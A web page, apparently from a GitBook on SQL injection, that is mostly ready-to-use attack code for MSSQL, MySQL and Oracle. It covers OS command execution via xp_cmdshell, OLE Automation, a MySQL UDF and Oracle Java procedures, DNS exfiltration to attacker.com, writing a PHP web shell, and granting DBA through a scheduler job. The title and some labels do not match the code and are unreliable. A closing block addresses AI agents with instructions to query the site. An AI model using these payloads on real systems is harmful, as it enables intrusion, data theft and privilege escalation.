# Techniques to Force Errors from Databases for SQL Injection

### MSSQL &#x20;

1. **OLE Automation Procedures**

   ```sql
   DECLARE @Object INT;
   EXEC sp_OACreate 'WScript.Shell', @Object OUTPUT;
   EXEC sp_OAMethod @Object, 'Run', NULL, 'cmd.exe /c whoami > C:\output.txt';
   ```

   This uses OLE Automation procedures to execute system commands.
2. **XP\_CMD Shell with Privilege Escalation**

   ```sql
   EXEC sp_configure 'show advanced options', 1;
   RECONFIGURE;
   EXEC sp_configure 'xp_cmdshell', 1;
   RECONFIGURE;
   EXEC xp_cmdshell 'whoami';
   ```

   This enables `xp_cmdshell` to execute system commands if it's not already enabled.
3. **Linked Servers**

   ```sql
   EXEC sp_addlinkedserver 'attacker_server';
   EXEC sp_addlinkedsrvlogin 'attacker_server', 'false', NULL, 'username', 'password';
   EXEC ('xp_cmdshell ''net user''') AT attacker_server;
   ```

   This technique uses linked servers to run commands on a different server.

### MySQL

1. **UDF (User Defined Functions) for Remote Command Execution**

   ```sql
   CREATE TABLE foo(line BLOB);
   INSERT INTO foo VALUES (LOAD_FILE('/usr/lib/lib_mysqludf_sys.so'));
   SELECT * FROM foo INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';
   CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';
   SELECT sys_exec('id > /tmp/out; chown mysql.mysql /tmp/out');
   ```

   This technique involves creating a UDF to execute system commands.
2. **DNS Exfiltration**

   ```sql
   SELECT LOAD_FILE(CONCAT('\\\\', (SELECT table_name FROM information_schema.tables LIMIT 0,1), '.attacker.com\\a'));
   ```

   This exfiltrates data through DNS requests to an attacker-controlled domain.
3. **Binary Log Injections**

   ```sql
   SET GLOBAL general_log = 'ON';
   SET GLOBAL general_log_file = '/var/lib/mysql/mysql.log';
   SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
   ```

   This exploits the binary log feature to write a web shell.

### Oracle

1. **Java Procedures for Command Execution**

   <pre class="language-sql" data-full-width="true"><code class="lang-sql">EXEC dbms_java.grant_permission( 'SCOTT', 'SYS:java.io.FilePermission', '&#x3C;&#x3C;ALL FILES>>', 'execute' );
   EXEC dbms_java.grant_permission( 'SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '' );
   EXEC dbms_java.grant_permission( 'SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '' );

   CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "cmd" AS
   import java.io.*;
   public class cmd {
      public static String run(String cmd) {
         try {
            StringBuffer output = new StringBuffer();
            Process p = Runtime.getRuntime().exec(cmd);
            BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
            String line = "";
            while ((line = reader.readLine())!= null) {
               output.append(line + "\n");
            }
            return output.toString();
         } catch (Exception e) {
            return e.toString();
         }
      }
   };
   /

   CREATE OR REPLACE FUNCTION run_cmd(p_cmd IN VARCHAR2) RETURN VARCHAR2
   AS LANGUAGE JAVA
   NAME 'cmd.run(java.lang.String) return java.lang.String';
   /

   SELECT run_cmd('id') FROM dual;
   </code></pre>

   This uses Java stored procedures to execute system commands.
2. **UTL\_FILE Package for File Access**

   ```sql
   DECLARE
      l_file UTL_FILE.FILE_TYPE;
      l_text VARCHAR2(32767);
   BEGIN
      l_file := UTL_FILE.FOPEN('DIRECTORY_NAME', 'output.txt', 'W');
      UTL_FILE.PUT_LINE(l_file, 'Data from UTL_FILE');
      UTL_FILE.FCLOSE(l_file);
   END;
   ```

   This technique uses the `UTL_FILE` package to write files to the server.
3. **DBMS\_SCHEDULER for Job Execution**

   <pre class="language-sql" data-full-width="true"><code class="lang-sql">BEGIN
      DBMS_SCHEDULER.create_job(
         job_name => 'job1',
         job_type => 'PLSQL_BLOCK',
         job_action => 'BEGIN EXECUTE IMMEDIATE ''GRANT DBA TO SCOTT''; END;',
         start_date => SYSTIMESTAMP,
         repeat_interval => NULL,
         end_date => NULL,
         enabled => TRUE
      );
   END;
   </code></pre>

   This uses `DBMS_SCHEDULER` to execute jobs that can change database permissions.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://nav1n0x.gitbook.io/advanced-sql-injection-techniques/techniques-to-force-errors-from-databases-for-sql-injection-1.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.